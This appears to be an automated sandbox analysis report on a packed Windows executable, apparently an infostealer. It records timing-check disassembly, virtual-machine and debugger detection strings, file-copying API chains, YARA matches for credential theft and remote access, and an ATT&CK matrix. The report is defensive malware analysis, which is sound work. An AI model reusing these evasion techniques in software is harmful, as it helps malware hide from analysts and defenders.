                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2FD5 second address: 10C2FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0C5DBE21DCh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2FE6 second address: 10C2FED instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CFD09 second address: 10CFD1D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d jc 00007F0C5DBE21D6h 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10CFD1D second address: 10CFD3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C5CC1AFD1h 0x00000009 jmp 00007F0C5CC1AFCBh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10CFD3D second address: 10CFD4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F0C5DBE21E2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10CFD4B second address: 10CFD51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10CFE84 second address: 10CFE9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5DBE21E1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10D5877 second address: 10D5898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F0C5CC1AFC6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 jno 00007F0C5CC1AFC6h 0x00000016 je 00007F0C5CC1AFC6h 0x0000001c pushad 0x0000001d popad 0x0000001e push edi 0x0000001f pop edi 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10D5898 second address: 10D589D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10D9F9B second address: 10D9F9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10D9F9F second address: 10D9FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0C5DBE21E0h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10D9FB5 second address: 10D9FDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CC1AFCEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0C5CC1AFD2h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10D9FDB second address: 10D9FE1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10E3560 second address: 10E358E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C5CC1AFD5h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0C5CC1AFD2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10EB3BA second address: 10EB3BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10EB9A4 second address: 10EB9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10EB9AA second address: 10EB9AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10EB9AE second address: 10EB9BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push ebx 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10EF293 second address: 10EF297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10EF297 second address: 10EF29B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10EF415 second address: 10EF438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C5DBE21E2h 0x00000009 jmp 00007F0C5DBE21DDh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10EF438 second address: 10EF465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CC1AFCFh 0x00000007 jmp 00007F0C5CC1AFD2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jnp 00007F0C5CC1AFD2h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F0E9C second address: 10F0EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop esi 0x00000009 jnc 00007F0C5DBE21D8h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jo 00007F0C5DBE21D6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F0EB9 second address: 10F0ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0C5CC1AFC6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F0C5CC1AFCDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F0ED5 second address: 10F0EDB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10FE599 second address: 10FE59D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110B0AB second address: 110B0AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110D039 second address: 110D03F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110D03F second address: 110D050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F0C5DBE21D6h 0x0000000c popad 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110E6D2 second address: 110E6DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 je 00007F0C5CC1AFC6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111EE49 second address: 111EE4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111EE4D second address: 111EE71 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 ja 00007F0C5CC1AFC6h 0x0000000f jg 00007F0C5CC1AFC6h 0x00000015 pop eax 0x00000016 push eax 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pop eax 0x0000001a popad 0x0000001b push ecx 0x0000001c jp 00007F0C5CC1AFCEh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111DDB2 second address: 111DDD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0C5DBE21E8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111E20D second address: 111E213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111E213 second address: 111E21E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0C5DBE21D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111E21E second address: 111E240 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0C5CC1AFD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c ja 00007F0C5CC1AFC6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FFCAE5 second address: FFCAE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FFCAE9 second address: FFCAFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C5CC1AFCDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11277BD second address: 11277C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11277C3 second address: 11277CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11277CA second address: 11277E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5DBE21E3h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11292AB second address: 11292D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007F0C5CC1AFD9h 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11292D1 second address: 11292D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11292D6 second address: 11292DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11292DC second address: 11292E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11292E0 second address: 11292E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5770357 second address: 577035B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 577035B second address: 5770361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57703CB second address: 57703CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57703CF second address: 57703E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CC1AFCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57703E0 second address: 57703F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C5DBE21DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57703F0 second address: 57703F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57703F4 second address: 5770433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F0C5DBE21E9h 0x00000012 or cx, 8266h 0x00000017 jmp 00007F0C5DBE21E1h 0x0000001c popfd 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5770433 second address: 5770438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5770438 second address: 577047F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5DBE21E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F0C5DBE21E6h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov ecx, 2A53B3BDh 0x00000019 mov dx, si 0x0000001c popad 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 577047F second address: 5770483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5770483 second address: 5770487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5770487 second address: 577048D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: E917FC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: E916CE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 106489D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: E91721 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 10C677D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C44910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C44570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3F68A FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C43EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C31160 GetSystemInfo,ExitProcess
Source: file.exe, file.exe, 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2133666234.0000000001A02000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133666234.0000000001A34000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133666234.0000000001A44000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2133666234.00000000019BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13467)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13470)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13489)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13481)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13521)
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C345C0 VirtualProtect ?,00000004,00000100,00000000
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C49860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C49750 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C478E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 6800, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C49600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: file.exe, 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: file.exe | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C47B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C47980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C47850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C47A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.c30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2133666234.00000000019BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2092431319.0000000005610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6800, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.c30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2133666234.00000000019BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2092431319.0000000005610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6800, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix, listed per tactic (a number in front of a technique is the report's hit count for that technique; techniques without a number carry no hits):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 2 Command and Scripting Interpreter; 11 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
